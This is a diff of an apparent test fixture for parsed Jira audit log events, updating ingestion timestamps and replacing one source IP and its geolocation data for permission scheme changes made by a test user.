@@ -4073,7 +4073,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782675517Z", + "ingested": "2021-12-15T09:00:47.652673346Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Move Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":187000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4143,7 +4143,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782677860Z", + "ingested": "2021-12-15T09:00:47.652674373Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Schedule Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":190000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4213,7 +4213,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782680213Z", + "ingested": "2021-12-15T09:00:47.652675293Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Modify Reporter\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":204000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4288,7 +4288,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782682550Z", + "ingested": "2021-12-15T09:00:47.652676231Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"View Voters and Watchers\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":208000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4358,7 +4358,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782684879Z", + "ingested": "2021-12-15T09:00:47.652677169Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Watchers\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":210000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4433,7 +4433,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782687204Z", + "ingested": "2021-12-15T09:00:47.652678159Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit All Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":212000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4508,7 +4508,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782689571Z", + "ingested": "2021-12-15T09:00:47.652679109Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Own Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":215000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4578,7 +4578,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782691944Z", + "ingested": "2021-12-15T09:00:47.652698255Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete All Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":217000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4653,7 +4653,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782694266Z", + "ingested": "2021-12-15T09:00:47.652699447Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Own Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":219000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4723,7 +4723,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782696622Z", + "ingested": "2021-12-15T09:00:47.652700364Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete All Attachments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":221000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4798,7 +4798,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782698972Z", + "ingested": "2021-12-15T09:00:47.652701272Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Own Attachments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":223000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4868,7 +4868,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782701296Z", + "ingested": "2021-12-15T09:00:47.652702286Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Own Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":225000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4938,7 +4938,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782703645Z", + "ingested": "2021-12-15T09:00:47.652703190Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit All Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":227000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -5013,7 +5013,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782705974Z", + "ingested": "2021-12-15T09:00:47.652704102Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Own Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":229000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -5083,7 +5083,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782708312Z", + "ingested": "2021-12-15T09:00:47.652705022Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete All Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":231000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -5158,7 +5158,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782710661Z", + "ingested": "2021-12-15T09:00:47.652705927Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"View Read-Only Workflow\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":233000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -5228,7 +5228,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782713012Z", + "ingested": "2021-12-15T09:00:47.652706840Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Transition Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":235000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -5298,7 +5298,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782715353Z", + "ingested": "2021-12-15T09:00:47.652707744Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"View Development Tools\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":236000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -5368,7 +5368,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782717810Z", + "ingested": "2021-12-15T09:00:47.652708756Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":239000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -5438,7 +5438,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782720142Z", + "ingested": "2021-12-15T09:00:47.652709665Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Start/Complete Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":241000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -5508,7 +5508,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782722466Z", + "ingested": "2021-12-15T09:00:47.652710554Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":243000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5566,7 +5566,7 @@ "jira.internal" ], "ip": [ - "55.6.73.144" + "175.16.199.1" ] }, "service": { 
@@ -5574,27 +5574,24 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", + "country_name": "China", + "region_name": "Jilin Sheng", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 721, - "organization": { - "name": "DoD Network Information Center" + "lon": 125.3228, + "lat": 43.88 } }, - "address": "55.6.73.144", - "ip": "55.6.73.144" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "event": { "action": "jira.auditing.permission.scheme.removed.from.project", - "ingested": "2021-12-08T14:50:53.782724805Z", - "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme removed from project\",\"actionI18nKey\":\"jira.auditing.permission.scheme.removed.from.project\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"55.6.73.144\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":249000000},\"version\":\"1.0\"}", + "ingested": "2021-12-15T09:00:47.652711447Z", + "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme removed from 
project\",\"actionI18nKey\":\"jira.auditing.permission.scheme.removed.from.project\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":249000000},\"version\":\"1.0\"}", "type": [ "deletion" ], @@ -5662,7 +5659,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.added.to.project", - "ingested": "2021-12-08T14:50:53.782727127Z", + "ingested": "2021-12-15T09:00:47.652729117Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme added to project\",\"actionI18nKey\":\"jira.auditing.permission.scheme.added.to.project\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":266000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
